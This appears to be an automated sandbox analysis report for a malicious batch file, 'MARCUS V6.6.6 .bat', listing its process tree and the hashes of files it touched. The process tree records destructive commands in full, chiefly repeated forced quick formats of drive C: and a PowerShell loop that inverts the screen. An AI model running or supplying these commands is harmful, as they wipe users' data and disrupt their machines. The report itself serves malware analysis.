                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:8884
                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                chcp 1250
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:9032
                                                                                                                                                                • C:\Windows\system32\mode.com
                                                                                                                                                                  mode 85,30
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:9052
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -c "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Inverter { [DllImport(\"user32.dll\")] public static extern int InvertRect(IntPtr hDC, ref System.Drawing.Rectangle lprc); }'; $rect = [System.Drawing.Rectangle]::FromLTRB(0,0,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); while($true) { [Inverter]::InvertRect([IntPtr]::Zero, [ref]$rect); Start-Sleep -Milliseconds 50 }"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:9144
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ige4gybm\ige4gybm.cmdline"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:9376
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\MARCUS V6.6.6 .bat"
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:9324
                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                          chcp 1250
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:9524
                                                                                                                                                                          • C:\Windows\system32\mode.com
                                                                                                                                                                            mode 85,30
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1960
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:9668
                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:9700
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:9840
                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:9964
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:10232
                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:10208
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:10228
                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:9288
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:9556
                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:10100
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:10196
                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:10204
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:10004
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:9996
                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:9820
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:9316
                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:10024
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:10324
                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4308
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:10312
                                                                                                                                                                                                                      • C:\Windows\system32\format.com
                                                                                                                                                                                                                        format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:10272
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:10344
                                                                                                                                                                                                                          • C:\Windows\system32\format.com
                                                                                                                                                                                                                            format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:10412
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:10996
                                                                                                                                                                                                                              • C:\Windows\system32\format.com
                                                                                                                                                                                                                                format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:10572
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:10616
                                                                                                                                                                                                                                  • C:\Windows\system32\format.com
                                                                                                                                                                                                                                    format C: /fs:NULL /p:3 /q
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:10656

                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnGraphiteCache\data_1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          b6eced7e034751b1d9b777fe035d709e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3c2c6fba247c46bf791b77fd65ef969c6e53bb17

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1ab911b7a216519871cb3d29e0c2095093c327d02d877651901465b5e1e1d1bb

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          3ee4d93dbda0f4dec85a47fccc3bd151f4a412e217bd02476da2600ea220d95e318cd28171067142b307529215e21a326765072ca721ab1d9de23f50c660ae90

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          354B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          20d851a3b613ebaa25df9c0fe3de3221

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          950a764ec6f5e3b44a3bcb69cb2b87411f6090f8

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          380a1c4ddc2892bf5c70ed4a30377e6a809d47270646cc01e31165a821858b67

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          4cfd4d22955fc10b93ff8393c389f0bcd0530194f04e42e9f50de0e962db0b7ac01c919b6780f59e73562e7c11fa9227f245778f33141eb0b4cddfa451fcc30a

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          48fd0f8bedd60ef9284c94814a01e2dc

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9a3c4af4f01d9d34251fd5c63f4aee11f66200a2

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          06c40527501185f8a61d178106fa976293b4fc399968c5eb2581cac874948740

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          4838bb28b7d445231f73bef44eead17b5a947fb648e7bbe33f9396dab136d06b7a56bde4e53840dbc50bd9f2283b8b41130d5699839c464ebefba0603c241f9d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          15KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          c0f738fac7f7f4abd16f730c578332f5

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9246cfaea53d76cdec1ae191ebff9bef4c6d3812

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0eebff33d23429faeb502b782cee9443f9273e010ce2a2765bec12a057487337

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c3030c7c9ac047334ec379aacbe2fe70db0db625ef6b0026317ef819434c28005b5261c0f1e1a84d8e2754a69e84f052f8dd727a4c2d57b5fe3fabd18c63d913

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0df6cbc19df40a0361d51146d37fc327

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          49bb54f43b138f6f0af5d070f09b64e89ef4e59e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3cd2bef32e1919e9d1767ad1180f73848c928b0ce8345186fbcbdd09ba3bbef1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          7b2f947248025586cb080ff29dca8ce9fd66a058e0a4d0164df148aaffe411f9082f03f69ee9c31558f283830705e3d3e27a27eb7cc0d646fecf40c10fc47d00

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5948d7.TMP

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          48B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          27248b7dc5b56e5d017b565beb089018

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e95d840988bef195b74099cc645119471c85b73c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5eec9b9ed18b57b102dda84e3f124d71e560839999c70b5279718c517e0838bb

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          fb3ac4a407e9ecbaaf838e00b207282fb6a4d0cf9aa10f725b871b5389e2cd7a275bc62cf373cb9fa5e95488e74fc41d9e9070e44d9e05306e4c98f2d917d959

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          81KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          6af8692b49678d7f8652cc01c9702070

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          96d02f15b82333f6b2a72eac9a9f1b9be86e9994

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          7b5f397f0bc0814e165fb0387b28d462a4564136404b4d09329baa1e576e7b65

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b5b7d0622d91f6eff7daa9eb2f44bc788a6fd17aa20678ed06e1a4d16be6e645c26397dd380c4116e6adbe59a7b3bff0c7b70ec057695c3b3639163245bfb783

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d20dfd0608a0a5b5253f683a9e44d2f3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          2b73357881a7f97b076d2cf63810ccb16302e945

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          92656c4743c714ac9ac46a6f08007b125bdd555ef966786765275767fa808789

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6660e02248cc641fa0806d6f3680ea0d1d70e3f3c29d195b4b7b7fadbe343f3398337c76f5b3402b6e33d972c199c5211f6ebf67fd6828cddc48cd21d2813868

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          105KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d57316a5fdde78663db40c63ffefd92d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b66c673cc5b7255a1cd96526bf230e1e5cf5b6e2

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          8dccfa3be3d3c4e8cdd0c42b6df2663badc6f530531d194aaefd46b6e4dccd5f

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          284538dff0d8f3e30a0fa747b644b80309d30eea729b7810ba215f378c816d299c5653e81db324e476794db643c529aa6780d4c1bf303306c6ba67e4b6362ddc

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2b5dd617bc51c4c1ccb00b32b7a551cb

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          7d736ba05663d721e586cb765fdbd30b8c95f5ae

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          cace12b31caef21a04e9b72cdaded7f3dab5d6e633385a91bb370c92f8eb1b69

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          6892aa73a27cd9b85f3361a933c7e47572df7d13e21ab914b37f715deee1e8d7341f1bcc4a9a17daa1d1fbef44ddfd3bfc0ae2d8d8e3b8802f0dd9ab56bff98b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5a7e1750438748bd333b79a94ca69b2a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          94fd1be56969e269ce195ba29c3d464d356d6556

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6d7a64a318c25c643323d5cf1c0c80ccf2f2433e7d74b722fca90468f8f9b914

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          842509c0f495ee24d152ab3f7867183d7cd64b01b5a9305405682abbbff3aa18a8ad7d97ee039393fdd1766fc17ad2df1caf711dc4db8dc7b9df608ffc0fdc7e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          eec55fe349980566b1dbf1d409d28c3e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          654ce4b550defea0851f12e8ff81ae9298bb3f60

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          2e81ea3d7ddfc0274f3955d5131143c481e63f2529514c5295873b393d508efe

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          58e02658d08732b5f36e868331a483b5fde15475a6c5f704a19c97d920399c3f7d41a8fa163c66683bf403598f8f48f0cf9fa468f9783fcabd9136a55cec0059

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          e3e7dddc4837e1b811b4447f71df51c9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ce3c479dc8dee85a98b6bf6450ba01ce03ca888a

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e2cfc3fdaa2c4f827d3a1ecb40cd55485fa23ed1b90549fdba37affbf7bc31bc

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d79b1a0dae17af37967fc9af7e69ebfdc72d430db8153f56bc2c6aa92638f5644b37eaa6da345f805a619d30c447addaeef035afc3968e8d8bd26495f0517b35

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5808b5.TMP

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          33fc327427c952d608f625b992c9958b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3a59991897e0693be3c14285a77b97a413067616

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3c60e60011d9b3eb200784b7e0bba37da3a7519326261ac7d92da9eac73928f7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d98267fbb69511a94f4285c3d49745a4ea6cd264934501f1c45b05f510fb0e65abd70d90d3d79bf0038a9ac4ea682e9c39132e6033b5436f5e881d49514849b5

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          69KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          164a788f50529fc93a6077e50675c617

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\_locales\en_US\messages.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          578215fbb8c12cb7e6cd73fbd16ec994

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          9471d71fa6d82ce1863b74e24237ad4fd9477187

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.91.1_0\manifest.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d7f153bc1705e465c201f5ba53bd25ab

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          055f9a40028bbf43f9ef36355e41b666d505716e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          15fc4a643e54ecb6b4ccacf11b14b314ccbdd534204bea8a46c5886627d224fa

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b782fe9bd5bfdf9dd63b722aa1a84d14d49116faccda91e38973318e4b958554de891c4404d5d86ac9cf9307ac5e61638080f95a7ebf00ce1c762815b9f04bc1

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_1\content.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3d20584f7f6c8eac79e17cca4207fb79

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3c16dcc27ae52431c8cdd92fbaab0341524d3092

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          06d55006c2dec078a94558b85ae01aef

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6a9b33e794b38153f67d433b30ac2a7cf66761e6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f070db5a804f373aa9d6f1236ec3cbc1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d2813838dee70f980e7620d81fa46473fb1dc081

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6933e83e6c3d4c0d9f8005173241c52a40464762d77227819ab3d55ca19cab9a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          3bb5010145bbf45c64b7ebdf4e1f518d81635a2a4ca150755621e0ecd536495576b9541da6ccbe72bb12043164503040430baceca402403b2ec209fecc0d3671

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          111B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          16KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          6bbe6caeacc480600e505611a46a57ae

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          8df9abe4230b4925824521f8e0e06f397c19e4a7

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b28933bb33599c3c32642b9e1e7602ab83d0a12a61cc7ad3923b548031abb8a3

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1b85ec7b5b7d4ff1047f701ca6320c70e205a8b3d4d702060965dfc00b239e3ab9307fed77db4e981ceed123493530292b6a94cc3af8b15d9b088db15a6c25f6

